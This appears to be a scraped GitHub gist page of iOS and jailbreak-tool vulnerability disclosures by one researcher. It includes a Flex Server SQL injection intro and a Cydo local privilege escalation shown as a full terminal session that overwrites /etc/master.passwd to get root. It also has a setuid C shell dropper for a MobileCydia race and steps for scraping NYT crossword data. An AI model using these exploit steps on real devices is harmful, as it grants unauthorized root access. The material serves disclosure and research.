
PythEch

  • Dcipher Analytics
  • Istanbul, Turkey
@PythEch
PythEch / flex_disclosure.md
Last active Jun 22, 2016
Flex Server Multiple Vulnerabilities
View flex_disclosure.md

Introduction

This gist includes multiple SQL injection vulnerabilities I found by accident on a bus while travelling. These vulnerabilities are easy to find, easy to exploit, and critical.

Background

I have already paid for Flex legacy but can't buy Flex 2 because of credit card restrictions. Anyway, I decided to give Flex 2 a shot and downloaded the beta from getdelta.co.

For fun, I tried to figure out whether spoofing the UDID is possible by patching Flex 2 itself. I already knew you had put so much work into DRM. I'm still unsuccessful at this.

View pwn.py
#! /usr/bin/env python
"""
PoC of AFCd Vulnerability After Pangu Jailbreak
Copyright (C) 2014 PythEch
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
@PythEch
PythEch / gist:d181bf1411057e480586
Last active Jun 22, 2016
Cydo Arbitrary Write Local Privilege Escalation
View gist:d181bf1411057e480586
Hakans-iPhone:/var/tmp mobile$ ln -s /etc/master.passwd
Hakans-iPhone:/var/tmp mobile$ mv master.passwd cydia.log
Hakans-iPhone:/var/tmp mobile$ /usr/libexec/cydia/cydo ":0:0::0:0:System Administrator:/var/root:/bin/sh"
thou shalt not pass
Hakans-iPhone:/var/tmp mobile$ su cydo
Hakans-iPhone:/var/tmp root# cat /etc/master.passwd
##
# User Database
#
# This file is the authoritative user database.
@PythEch
PythEch / poc.md
Last active Jun 22, 2016
MobileCydia.mm Race Condition LPE
View poc.md

Generic shell dropper:

#include <sys/types.h>
#include <unistd.h>

/* Classic setuid shell payload: assumes the binary runs with an effective
 * uid of 0 (e.g. after the race described above); setuid(0) then makes the
 * real uid root before execl replaces the process with a shell. */
int main(int argc, char **argv, char **envp) {
    setuid(0);
    /* The argument list must be terminated by a null pointer, not a bare 0,
     * which is an int and may not be pointer-sized on every ABI. */
    execl("/bin/sh", "/bin/sh", (char *)NULL);
    return 0;
}
View nytimes_crossword
1. Get https://nyt-games-prd.appspot.com/svc/crosswords/v3/games-hub-puzzles.json
2. Extract results.mini_puzzle.[*].puzzle_id
3. Then head over to https://nyt-games-prd.appspot.com/svc/crosswords/v6/${puzzle_id}.json
4. Parse the data.